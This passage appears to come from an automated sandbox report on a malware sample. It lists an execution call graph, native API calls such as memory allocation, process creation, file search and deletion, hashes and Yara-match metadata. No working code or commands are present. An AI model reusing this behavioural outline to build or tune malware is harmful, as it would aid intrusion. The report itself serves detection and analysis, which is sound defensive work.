                                                              • String ID: @$@4rw@4rw
                                                              • API String ID: 4062629308-2979693914
                                                              • Opcode ID: 9d6096ce58fde0d5c1c3332b1a3578b2fcc92fb771b40011372052557c13c146
                                                              • Instruction ID: 50ca93421b75053aac0ab0ef921e2d322dca5992136350db1f0449ca82d97822
                                                              • Opcode Fuzzy Hash: 9d6096ce58fde0d5c1c3332b1a3578b2fcc92fb771b40011372052557c13c146
                                                              • Instruction Fuzzy Hash: A9418B72900219DFDB219FA9C890AADBBF8FF64B50F00452FE915DF264E7748901CB61

                                                              Execution Graph

                                                              Execution Coverage:2.5%
                                                              Dynamic/Decrypted Code Coverage:4.3%
                                                              Signature Coverage:1.6%
                                                              Total number of Nodes:443
                                                              Total number of Limit Nodes:73
                                                              execution_graph 101684 293b6d0 101685 295b630 NtAllocateVirtualMemory 101684->101685 101686 293cd41 101685->101686 101687 29472d0 101688 29472ec 101687->101688 101696 294733f 101687->101696 101690 2959630 NtClose 101688->101690 101688->101696 101689 2947471 101691 2947307 101690->101691 101697 29466f0 NtClose LdrInitializeThunk LdrInitializeThunk 101691->101697 101693 294744e 101693->101689 101699 29468c0 NtClose LdrInitializeThunk LdrInitializeThunk 101693->101699 101696->101689 101698 29466f0 NtClose LdrInitializeThunk LdrInitializeThunk 101696->101698 101697->101696 101698->101693 101699->101689 101296 2958c90 101297 2958caa 101296->101297 101300 32c2df0 LdrInitializeThunk 101297->101300 101298 2958ccf 101300->101298 101301 2959590 101302 2959604 101301->101302 101304 29595b8 101301->101304 101303 2959617 NtDeleteFile 101302->101303 101305 2955b90 101306 2955bf5 101305->101306 101307 2955c2c 101306->101307 101310 29513b0 101306->101310 101309 2955c0e 101311 29513c2 101310->101311 101312 295134c 101310->101312 101315 295b630 101312->101315 101314 2951361 101314->101309 101318 2959790 101315->101318 101317 295b661 101317->101314 101319 29597bb 101318->101319 101320 2959825 101318->101320 101319->101317 101321 2959838 NtAllocateVirtualMemory 101320->101321 101321->101317 101322 2951d10 101323 2951d29 101322->101323 101324 2951dbc 101323->101324 101325 2951d74 101323->101325 101328 2951db7 101323->101328 101330 295b6c0 101325->101330 101329 295b6c0 RtlFreeHeap 101328->101329 101329->101324 101333 2959980 101330->101333 101332 2951d84 101334 295999a 101333->101334 101335 29599a8 RtlFreeHeap 101334->101335 101335->101332 101702 2939ec0 101703 2939ecf 101702->101703 101704 2939f10 101703->101704 101705 2939efd CreateThread 101703->101705 101341 2951980 101342 295199c 101341->101342 101343 29519c4 101342->101343 101344 29519d8 101342->101344 101346 2959630 NtClose 101343->101346 101351 2959630 101344->101351 101348 29519cd 101346->101348 101347 29519e1 101354 295b7e0 RtlAllocateHeap 101347->101354 101350 29519ec 101352 295964a 101351->101352 101353 2959658 NtClose 101352->101353 101353->101347 101354->101350 101711 295c7c0 101712 295b6c0 RtlFreeHeap 101711->101712 101713 295c7d5 101712->101713 101714 2959340 101715 29593f4 101714->101715 101717 295936c 101714->101717 101716 2959407 NtCreateFile 101715->101716 101718 29432c3 101719 2947f20 2 API calls 101718->101719 101720 29432d3 101719->101720 101721 29432ef 101720->101721 101722 2959630 NtClose 101720->101722 101722->101721 101355 29474b0 101356 29474c8 101355->101356 101358 2947522 101355->101358 101356->101358 101359 294b430 101356->101359 101360 294b456 101359->101360 101361 294b68f 101360->101361 101386 2959a00 101360->101386 101361->101358 101363 294b4d2 101363->101361 101389 295c890 101363->101389 101365 294b4f1 101365->101361 101366 294b5c8 101365->101366 101395 2958ce0 101365->101395 101368 2945ce0 LdrInitializeThunk 101366->101368 101370 294b5e7 101366->101370 101368->101370 101374 294b677 101370->101374 101406 2958860 101370->101406 101371 294b5b0 101402 29482a0 101371->101402 101372 294b58e 101421 2954980 LdrInitializeThunk 101372->101421 101373 294b55c 101373->101361 101373->101371 101373->101372 101399 2945ce0 101373->101399 101380 29482a0 LdrInitializeThunk 101374->101380 101382 294b685 101380->101382 101381 294b64e 101411 2958910 101381->101411 101382->101358 101384 294b668 101416 2958a70 101384->101416 101387 2959a1a 101386->101387 101388 2959a2b CreateProcessInternalW 101387->101388 101388->101363 101390 295c800 101389->101390 101392 295c85d 101390->101392 101422 295b7a0 101390->101422 101392->101365 101393 295c83a 101394 295b6c0 RtlFreeHeap 101393->101394 101394->101392 101396 2958cfa 101395->101396 101428 32c2c0a 101396->101428 101397 294b553 101397->101366 101397->101373 101401 2945d1e 101399->101401 101431 2958ea0 101399->101431 101401->101372 101403 29482b3 101402->101403 101437 2958be0 101403->101437 101405 29482de 101405->101358 101407 29588da 101406->101407 101408 2958888 101406->101408 101443 32c39b0 LdrInitializeThunk 101407->101443 101408->101381 101409 29588fc 101409->101381 101412 295898a 101411->101412 101414 2958938 101411->101414 101444 32c4340 LdrInitializeThunk 101412->101444 101413 29589ac 101413->101384 101414->101384 101417 2958aed 101416->101417 101419 2958a9b 101416->101419 101445 32c2fb0 LdrInitializeThunk 101417->101445 101418 2958b0f 101418->101374 101419->101374 101421->101371 101425 2959940 101422->101425 101424 295b7bb 101424->101393 101426 295995a 101425->101426 101427 2959968 RtlAllocateHeap 101426->101427 101427->101424 101429 32c2c1f LdrInitializeThunk 101428->101429 101430 32c2c11 101428->101430 101429->101397 101430->101397 101432 2958f51 101431->101432 101434 2958ecf 101431->101434 101436 32c2d10 LdrInitializeThunk 101432->101436 101433 2958f93 101433->101401 101434->101401 101436->101433 101438 2958c5b 101437->101438 101440 2958c08 101437->101440 101442 32c2dd0 LdrInitializeThunk 101438->101442 101439 2958c7d 101439->101405 101440->101405 101442->101439 101443->101409 101444->101413 101445->101418 101446 294fa30 101447 294fa94 101446->101447 101475 2946460 101447->101475 101449 294fbce 101450 294fbc7 101450->101449 101482 2946570 101450->101482 101452 294fd73 101453 294fd82 101456 2959630 NtClose 101453->101456 101454 294fc4a 101454->101452 101454->101453 101486 294f810 101454->101486 101458 294fd8c 101456->101458 101457 294fc86 101457->101453 101459 294fc91 101457->101459 101460 295b7a0 RtlAllocateHeap 101459->101460 101461 294fcba 101460->101461 101462 294fcc3 101461->101462 101463 294fcd9 101461->101463 101464 2959630 NtClose 101462->101464 101495 294f700 CoInitialize 101463->101495 101466 294fccd 101464->101466 101467 294fce7 101498 2959120 101467->101498 101469 294fd62 101470 2959630 NtClose 101469->101470 101471 294fd6c 101470->101471 101472 295b6c0 RtlFreeHeap 101471->101472 101472->101452 101473 294fd05 101473->101469 101474 2959120 LdrInitializeThunk 101473->101474 101474->101473 101476 294646a 101475->101476 101477 29464b7 101476->101477 101502 29591c0 101476->101502 101477->101450 101479 29464da 101479->101477 101480 2959630 NtClose 101479->101480 101481 294655c 101480->101481 101481->101450 101483 2946595 101482->101483 101507 2958fe0 101483->101507 101487 294f82c 101486->101487 101512 2944700 101487->101512 101489 294f853 101489->101457 101490 294f84a 101490->101489 101491 2944700 LdrLoadDll 101490->101491 101492 294f91e 101491->101492 101493 2944700 LdrLoadDll 101492->101493 101494 294f97b 101492->101494 101493->101494 101494->101457 101497 294f765 101495->101497 101496 294f7fb CoUninitialize 101496->101467 101497->101496 101499 295913a 101498->101499 101516 32c2ba0 LdrInitializeThunk 101499->101516 101500 2959167 101500->101473 101503 29591dd 101502->101503 101506 32c2ca0 LdrInitializeThunk 101503->101506 101504 2959206 101504->101479 101506->101504 101508 2958ffa 101507->101508 101511 32c2c60 LdrInitializeThunk 101508->101511 101509 2946609 101509->101454 101511->101509 101513 2944724 101512->101513 101514 294472b 101513->101514 101515 2944760 LdrLoadDll 101513->101515 101514->101490 101515->101514 101516->101500 101517 294c7b0 101519 294c7d9 101517->101519 101518 294c8dd 101519->101518 101520 294c883 FindFirstFileW 101519->101520 101520->101518 101523 294c89e 101520->101523 101521 294c8c4 FindNextFileW 101522 294c8d6 FindClose 101521->101522 101521->101523 101522->101518 101523->101521 101524 2949db0 101525 2949dbf 101524->101525 101526 2949dc6 101525->101526 101527 295b6c0 RtlFreeHeap 101525->101527 101527->101526 101528 2946f30 101529 2946f5a 101528->101529 101532 29480d0 101529->101532 101531 2946f84 101533 29480ed 101532->101533 101539 2958dc0 101533->101539 101535 294813d 101536 2948144 101535->101536 101537 2958ea0 LdrInitializeThunk 101535->101537 101536->101531 101538 294816d 101537->101538 101538->101531 101540 2958e5b 101539->101540 101542 2958deb 101539->101542 101544 32c2f30 LdrInitializeThunk 101540->101544 101541 2958e91 101541->101535 101542->101535 101544->101541 101724 294aef0 101729 294ac00 101724->101729 101726 294aefd 101743 294a870 101726->101743 101728 294af19 101730 294ac25 101729->101730 101754 2948510 101730->101754 101733 294ad70 101733->101726 101735 294ad87 101735->101726 101736 294ad7e 101736->101735 101738 294ae75 101736->101738 101773 294a2c0 101736->101773 101740 294aeda 101738->101740 101782 294a630 101738->101782 101741 295b6c0 RtlFreeHeap 101740->101741 101742 294aee1 101741->101742 101742->101726 101744 294a886 101743->101744 101751 294a891 101743->101751 101745 295b7a0 RtlAllocateHeap 101744->101745 101745->101751 101746 294a8b5 101746->101728 101747 2948510 GetFileAttributesW 101747->101751 101748 294abd2 101749 294abeb 101748->101749 101750 295b6c0 RtlFreeHeap 101748->101750 101749->101728 101750->101749 101751->101746 101751->101747 101751->101748 101752 294a2c0 RtlFreeHeap 101751->101752 101753 294a630 RtlFreeHeap 101751->101753 101752->101751 101753->101751 101755 2948531 101754->101755 101756 2948543 101755->101756 101757 2948538 GetFileAttributesW 101755->101757 101756->101733 101758 2953550 101756->101758 101757->101756 101759 295355e 101758->101759 101760 2953565 101758->101760 101759->101736 101761 2944700 LdrLoadDll 101760->101761 101762 295359a 101761->101762 101763 29535a9 101762->101763 101786 2953010 LdrLoadDll 101762->101786 101765 295b7a0 RtlAllocateHeap 101763->101765 101769 2953757 101763->101769 101766 29535c2 101765->101766 101767 295374d 101766->101767 101766->101769 101770 29535de 101766->101770 101768 295b6c0 RtlFreeHeap 101767->101768 101767->101769 101768->101769 101769->101736 101770->101769 101771 295b6c0 RtlFreeHeap 101770->101771 101772 2953741 101771->101772 101772->101736 101774 294a2e6 101773->101774 101787 294dd30 101774->101787 101776 294a358 101777 294a376 101776->101777 101778 294a4e0 101776->101778 101779 294a4c5 101777->101779 101792 294a180 101777->101792 101778->101779 101780 294a180 RtlFreeHeap 101778->101780 101779->101736 101780->101778 101783 294a656 101782->101783 101784 294dd30 RtlFreeHeap 101783->101784 101785 294a6dd 101784->101785 101785->101738 101786->101763 101789 294dd54 101787->101789 101788 294dd61 101788->101776 101789->101788 101790 295b6c0 RtlFreeHeap 101789->101790 101791 294dda4 101790->101791 101791->101776 101793 294a19d 101792->101793 101796 294ddc0 101793->101796 101795 294a2a3 101795->101777 101797 294dde4 101796->101797 101798 294de8e 101797->101798 101799 295b6c0 RtlFreeHeap 101797->101799 101798->101795 101799->101798 101800 2940f70 101801 2940f89 101800->101801 101802 2944700 LdrLoadDll 101801->101802 101803 2940fa7 101802->101803 101804 2940ff3 101803->101804 101805 2940fe0 PostThreadMessageW 101803->101805 101805->101804 101545 2950330 101546 295034d 101545->101546 101547 2944700 LdrLoadDll 101546->101547 101548 295036b 101547->101548 101806 2956270 101807 29562ca 101806->101807 101809 29562d7 101807->101809 101810 2953c80 101807->101810 101811 295b630 NtAllocateVirtualMemory 101810->101811 101812 2953cc1 101811->101812 101813 2944700 LdrLoadDll 101812->101813 101815 2953dbd 101812->101815 101816 2953d07 101813->101816 101814 2953d45 Sleep 101814->101816 101815->101809 101816->101814 101816->101815 101549 29489bb 101550 29489cb 101549->101550 101551 294897b 101550->101551 101553 2947250 101550->101553 101554 2947266 101553->101554 101556 294729f 101553->101556 101554->101556 101557 29470c0 LdrLoadDll 101554->101557 101556->101551 101557->101556 101558 2939f20 101561 293a1ba 101558->101561 101560 293a54d 101561->101560 101562 295b320 101561->101562 101563 295b346 101562->101563 101568 2934120 101563->101568 101565 295b352 101566 295b38b 101565->101566 101571 2955800 101565->101571 101566->101560 101575 29433d0 101568->101575 101570 293412d 101570->101565 101572 2955862 101571->101572 101574 295586f 101572->101574 101586 2941bb0 101572->101586 101574->101566 101576 29433ea 101575->101576 101578 2943400 101576->101578 101579 295a060 101576->101579 101578->101570 101580 295a07a 101579->101580 101581 295a0a9 101580->101581 101582 2958ce0 LdrInitializeThunk 101580->101582 101581->101578 101583 295a106 101582->101583 101584 295b6c0 RtlFreeHeap 101583->101584 101585 295a11f 101584->101585 101585->101578 101587 2941be8 101586->101587 101602 2948030 101587->101602 101589 2941bf0 101590 2941ec0 101589->101590 101591 295b7a0 RtlAllocateHeap 101589->101591 101590->101574 101592 2941c06 101591->101592 101593 295b7a0 RtlAllocateHeap 101592->101593 101594 2941c17 101593->101594 101595 295b7a0 RtlAllocateHeap 101594->101595 101596 2941c28 101595->101596 101601 2941cbf 101596->101601 101617 2946bc0 NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 101596->101617 101598 2944700 LdrLoadDll 101599 2941e72 101598->101599 101613 2958140 101599->101613 101601->101598 101603 294805c 101602->101603 101618 2947f20 101603->101618 101606 29480a1 101608 29480bd 101606->101608 101611 2959630 NtClose 101606->101611 101607 2948089 101609 2948094 101607->101609 101610 2959630 NtClose 101607->101610 101608->101589 101609->101589 101610->101609 101612 29480b3 101611->101612 101612->101589 101614 29581a2 101613->101614 101616 29581af 101614->101616 101629 2941ed0 101614->101629 101616->101590 101617->101601 101619 2948016 101618->101619 101620 2947f3a 101618->101620 101619->101606 101619->101607 101624 2958d70 101620->101624 101623 2959630 NtClose 101623->101619 101625 2958d8a 101624->101625 101628 32c35c0 LdrInitializeThunk 101625->101628 101626 294800a 101626->101623 101628->101626 101645 2948300 101629->101645 101631 2941ef0 101638 294244a 101631->101638 101649 2951340 101631->101649 101634 294210a 101636 295c890 2 API calls 101634->101636 101635 2941f4e 101635->101638 101653 295c760 101635->101653 101639 294211f 101636->101639 101637 29482a0 LdrInitializeThunk 101641 294216f 101637->101641 101638->101616 101639->101641 101658 2940a00 101639->101658 101641->101637 101641->101638 101643 2940a00 LdrInitializeThunk 101641->101643 101642 29482a0 LdrInitializeThunk 101644 29422c3 101642->101644 101643->101641 101644->101641 101644->101642 101646 294830d 101645->101646 101647 2948335 101646->101647 101648 294832e SetErrorMode 101646->101648 101647->101631 101648->101647 101650 2951359 101649->101650 101651 295b630 NtAllocateVirtualMemory 101650->101651 101652 2951361 101651->101652 101652->101635 101654 295c776 101653->101654 101655 295c770 101653->101655 101656 295b7a0 RtlAllocateHeap 101654->101656 101655->101634 101657 295c79c 101656->101657 101657->101634 101661 29598b0 101658->101661 101662 29598ca 101661->101662 101665 32c2c70 LdrInitializeThunk 101662->101665 101663 2940a22 101663->101644 101665->101663 101817 29424e7 101818 29424f1 101817->101818 101820 294245e 101817->101820 101821 29424d3 101820->101821 101822 2958ce0 LdrInitializeThunk 101820->101822 101823 29596c0 101820->101823 101822->101820 101824 295974f 101823->101824 101825 29596eb 101823->101825 101828 32c2e80 LdrInitializeThunk 101824->101828 101825->101820 101826 295977d 101826->101820 101828->101826 101829 2945d60 101830 29482a0 LdrInitializeThunk 101829->101830 101831 2945d90 101829->101831 101830->101831 101833 2945dbc 101831->101833 101834 2948220 101831->101834 101835 2948264 101834->101835 101840 2948285 101835->101840 101841 29589c0 101835->101841 101837 2948291 101837->101831 101838 2948275 101838->101837 101839 2959630 NtClose 101838->101839 101839->101840 101840->101831 101842 2958a3d 101841->101842 101844 29589eb 101841->101844 101846 32c4650 LdrInitializeThunk 101842->101846 101843 2958a5f 101843->101838 101844->101838 101846->101843 101666 29594a0 101667 2959544 101666->101667 101669 29594c8 101666->101669 101668 2959557 NtReadFile 101667->101668 101675 2958b20 101676 2958bac 101675->101676 101678 2958b48 101675->101678 101680 32c2ee0 LdrInitializeThunk 101676->101680 101677 2958bda 101680->101677 101847 32c2ad0 LdrInitializeThunk 101681 294292a 101682 2942963 101681->101682 101683 2946460 2 API calls 101681->101683 101683->101682

                                                              Executed Functions

                                                              Function 02939F20 Relevance: 20.4, Strings: 16, Instructions: 350COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 165 2939f20-293a1b8 166 293a1c9-293a1d2 165->166 167 293a1d4-293a1e7 166->167 168 293a1e9-293a1f7 166->168 167->166 169 293a202-293a209 168->169 171 293a20b-293a246 169->171 172 293a248 169->172 171->169 173 293a24f-293a253 172->173 175 293a255-293a26c 173->175 176 293a26e-293a27e 173->176 175->173 176->176 177 293a280-293a287 176->177 178 293a2b1 177->178 179 293a289-293a29b 177->179 182 293a2b8-293a2bc 178->182 180 293a2a2-293a2a4 179->180 181 293a29d-293a2a1 179->181 185 293a2a6-293a2ac 180->185 186 293a2af 180->186 181->180 183 293a2ea-293a2f4 182->183 184 293a2be-293a2e8 182->184 187 293a305-293a311 183->187 184->182 185->186 186->177 188 293a313-293a322 187->188 189 293a324-293a32d 187->189 188->187 191 293a333-293a33d 189->191 192 293a4fd-293a504 189->192 195 293a34e-293a357 191->195 193 293a50a-293a514 192->193 194 293a5cc-293a5d6 192->194 196 293a525-293a531 193->196 197 293a367-293a36b 195->197 198 293a359-293a365 195->198 199 293a533-293a546 196->199 200 293a548 call 295b320 196->200 201 293a377-293a381 197->201 202 293a36d-293a374 197->202 198->195 204 293a516-293a51f 199->204 207 293a54d-293a557 200->207 206 293a392-293a39e 201->206 202->201 204->196 208 293a3a0-293a3b2 206->208 209 293a3b4-293a3b7 206->209 212 293a568-293a571 207->212 208->206 210 293a3bd-293a3c6 209->210 213 293a3eb-293a3fa 210->213 214 293a3c8-293a3e9 210->214 215 293a573-293a585 212->215 216 293a587-293a58b 212->216 218 293a44b-293a452 213->218 219 293a3fc-293a406 213->219 214->210 215->212 216->194 217 293a58d-293a5ae 216->217 221 293a5b0-293a5b9 217->221 222 293a5bc-293a5ca 217->222 224 293a454-293a487 218->224 225 293a489-293a48f 218->225 223 293a417-293a420 219->223 221->222 222->216 226 293a422-293a434 223->226 227 293a436-293a446 223->227 224->218 228 293a493-293a497 225->228 226->223 227->192 230 293a499-293a4b6 228->230 231 293a4b8-293a4c2 228->231 230->228 232 293a4c4-293a4d4 231->232 233 293a4f8 231->233 234 293a4e7-293a4f0 232->234 235 293a4d6-293a4e5 232->235 233->189 236 293a4f6 234->236 235->236 236->231
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000B.00000002.3137743344.0000000002930000.00000040.80000000.00040000.00000000.sdmp, Offset: 02930000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_11_2_2930000_finger.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 5Z$9$<$>$L$N$N$Pw$So$`$fN$j$m$n$X$s
                                                              • API String ID: 0-2357910541
                                                              • Opcode ID: 753580bf213d30355589e9630f1d4b18eaa8e9bb42518d70e4d75e0ea6cf0002
                                                              • Instruction ID: a67bdfb44f4425136238db4b7671cb89d1e37b5f69bc356b75deb45b18bdadb2
                                                              • Opcode Fuzzy Hash: 753580bf213d30355589e9630f1d4b18eaa8e9bb42518d70e4d75e0ea6cf0002
                                                              • Instruction Fuzzy Hash: D902CEB0D05229CFEB25CF98C898BEDBBB2BB44308F1081D9D44A7B281C7795A85CF55
                                                              Function 0294C7B0 Relevance: 4.6, APIs: 3, Instructions: 106fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • FindFirstFileW.KERNELBASE(?,00000000), ref: 0294C894
                                                              • FindNextFileW.KERNELBASE(?,00000010), ref: 0294C8CF
                                                              • FindClose.KERNELBASE(?), ref: 0294C8DA
                                                              Memory Dump Source
                                                              • Source File: 0000000B.00000002.3137743344.0000000002930000.00000040.80000000.00040000.00000000.sdmp, Offset: 02930000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_11_2_2930000_finger.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Find$File$CloseFirstNext
                                                              • String ID:
                                                              • API String ID: 3541575487-0
                                                              • Opcode ID: 74d106090a7080095cc7420a55ff87f1c068363cb79c4006443c16e485b3f75b
                                                              • Instruction ID: ca03acc90efd6b3c9559dbc033af9336c2a4282aff89b733e56e8da6c31e4297
                                                              • Opcode Fuzzy Hash: 74d106090a7080095cc7420a55ff87f1c068363cb79c4006443c16e485b3f75b
                                                              • Instruction Fuzzy Hash: D6318671A003087FDB21EFA0CC85FEF777DDF84744F144559B919A6190DB70AA848BA0
                                                              Function 02959340 Relevance: 1.6, APIs: 1, Instructions: 101filenativeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • NtCreateFile.NTDLL(161FBA40,?,?,?,?,?,?,?,?,?,?), ref: 02959438
                                                              Memory Dump Source
                                                              • Source File: 0000000B.00000002.3137743344.0000000002930000.00000040.80000000.00040000.00000000.sdmp, Offset: 02930000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_11_2_2930000_finger.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CreateFile
                                                              • String ID:
                                                              • API String ID: 823142352-0
                                                              • Opcode ID: 913b0aa7505f0623b442c70bc7bed9716eb88d71eb565b98757f04a2e86dff34
                                                              • Instruction ID: 563f4675e3738080e23589bd23f653ac1bad75bcdd9ee0a0580abec48fb36433
                                                              • Opcode Fuzzy Hash: 913b0aa7505f0623b442c70bc7bed9716eb88d71eb565b98757f04a2e86dff34
                                                              • Instruction Fuzzy Hash: 8631B0B5A00648ABDB14DF99D880EEEB7F9EF88714F108219FD19A7340D734A951CFA4
                                                              Function 029594A0 Relevance: 1.6, APIs: 1, Instructions: 93filenativeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • NtReadFile.NTDLL(161FBA40,?,?,?,?,?,?,?,?), ref: 02959580
                                                              Memory Dump Source
                                                              • Source File: 0000000B.00000002.3137743344.0000000002930000.00000040.80000000.00040000.00000000.sdmp, Offset: 02930000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_11_2_2930000_finger.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: FileRead
                                                              • String ID:
                                                              • API String ID: 2738559852-0
                                                              • Opcode ID: e6f3ba0a2a121550311ff52ac0598f0ab7352921171cdb98717c8912cdbe003b
                                                              • Instruction ID: ec343083f077524a32a4471bd2844bee1a7d0b227209678ef8017ad06130532a
                                                              • Opcode Fuzzy Hash: e6f3ba0a2a121550311ff52ac0598f0ab7352921171cdb98717c8912cdbe003b
                                                              • Instruction Fuzzy Hash: 5131C2B5A00608ABDB14DF99D881EEFB7F9EF88714F108219FD19A7240D734A911CFA4
                                                              Function 02959790 Relevance: 1.6, APIs: 1, Instructions: 81memorynativeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • NtAllocateVirtualMemory.NTDLL(161FBA40,?,029581AF,00000000,00000004,00003000,?,?,?,?,?,029581AF,02941F4E), ref: 02959855
                                                              Memory Dump Source
                                                              • Source File: 0000000B.00000002.3137743344.0000000002930000.00000040.80000000.00040000.00000000.sdmp, Offset: 02930000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_11_2_2930000_finger.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AllocateMemoryVirtual
                                                              • String ID:
                                                              • API String ID: 2167126740-0
                                                              • Opcode ID: a1c1bc1c7ed6e412f4197ea02707f05ce7fd928f0e11f28bcc27ba9ea0b3128d
                                                              • Instruction ID: 750b23b3d44de0a9ecd95733b9b99cac130f8eaede657ef943f47c37c6cecb0e
                                                              • Opcode Fuzzy Hash: a1c1bc1c7ed6e412f4197ea02707f05ce7fd928f0e11f28bcc27ba9ea0b3128d
                                                              • Instruction Fuzzy Hash: 752117B5A00618ABDB10DF99DC41EEFB7BAEF88700F108219FD19A7241D774A911CFA5
                                                              Function 02959590 Relevance: 1.6, APIs: 1, Instructions: 61filenativeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • NtDeleteFile.NTDLL(161FBA40), ref: 02959620
                                                              Memory Dump Source
                                                              • Source File: 0000000B.00000002.3137743344.0000000002930000.00000040.80000000.00040000.00000000.sdmp, Offset: 02930000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_11_2_2930000_finger.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: DeleteFile
                                                              • String ID:
                                                              • API String ID: 4033686569-0
                                                              • Opcode ID: d7fd5be2052f01351cd39b10a120a2b64c712234ba1b204dfdc6d8a01e2bf1db
                                                              • Instruction ID: 51675f62b023e64be767ccd10da86d0f2241a8de624e956b39a73af391d07133
                                                              • Opcode Fuzzy Hash: d7fd5be2052f01351cd39b10a120a2b64c712234ba1b204dfdc6d8a01e2bf1db
                                                              • Instruction Fuzzy Hash: 6211CA71A00218ABDB20EB68CC41FAB77ADEB84710F108119FE08A7280D770AA058FE5
                                                              Function 02959630 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 02959661
                                                              Memory Dump Source
                                                              • Source File: 0000000B.00000002.3137743344.0000000002930000.00000040.80000000.00040000.00000000.sdmp, Offset: 02930000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_11_2_2930000_finger.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Close
                                                              • String ID:
                                                              • API String ID: 3535843008-0
                                                              • Opcode ID: 085c86df9dafaac33c1aaa89ff5402a964957b63bb21a493f7364fc0a86431e4
                                                              • Instruction ID: c515d6c6c7ba5898a2ee091b9e51ad0ef1ce5501ea44ec245cb6fb6fa845caf7
                                                              • Opcode Fuzzy Hash: 085c86df9dafaac33c1aaa89ff5402a964957b63bb21a493f7364fc0a86431e4
                                                              • Instruction Fuzzy Hash: E9E08C762002147BC620EA5ADC40FDBB7AEDFC6720F008015FA0CA7240CA70BA12CBF4
                                                              Function 032C4340 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000000B.00000002.3140702955.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                              • Associated: 0000000B.00000002.3140702955.0000000003379000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000B.00000002.3140702955.000000000337D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000B.00000002.3140702955.00000000033EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_11_2_3250000_finger.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 00cf68425afbdcaed81e6eb0fd3a69a28be2188fbd2081127e2604e0cc5a3d1c
                                                              • Instruction ID: 8ae7859e49be49a72125e0cd35491b089aacf0a49fe9df9f49ddde295a878e21
                                                              • Opcode Fuzzy Hash: 00cf68425afbdcaed81e6eb0fd3a69a28be2188fbd2081127e2604e0cc5a3d1c
                                                              • Instruction Fuzzy Hash: 66900235615814129140B1584884546401597E0301B55C011E1424554C8B148A965361
                                                              Function 032C4650 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000000B.00000002.3140702955.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                              • Associated: 0000000B.00000002.3140702955.0000000003379000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000B.00000002.3140702955.000000000337D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000B.00000002.3140702955.00000000033EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_11_2_3250000_finger.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 604097280ecee44ae760fb3b9d4e069ba1b95d0ddeaed764736ec27da8a6b3a4
                                                              • Instruction ID: af10dc0e1648d8dda5bd2ca4bf2a63b365c30ff3f95d85bcd779112ea1449873
                                                              • Opcode Fuzzy Hash: 604097280ecee44ae760fb3b9d4e069ba1b95d0ddeaed764736ec27da8a6b3a4
                                                              • Instruction Fuzzy Hash: E7900475711514434140F15C4C044077015D7F13013D5C115F1554570CC71CCDD5D37D
                                                              Function 032C2B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000000B.00000002.3140702955.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                              • Associated: 0000000B.00000002.3140702955.0000000003379000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000B.00000002.3140702955.000000000337D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000B.00000002.3140702955.00000000033EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_11_2_3250000_finger.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: be32dfa56d30c3f420fd89ec5cc1aeedab87014bef5d2ad5ca23fe37e367ef13
                                                              • Instruction ID: 477e9216d6550ec3bb175b241ac2674decda09c0969ea79c40f84ee749e69e0d
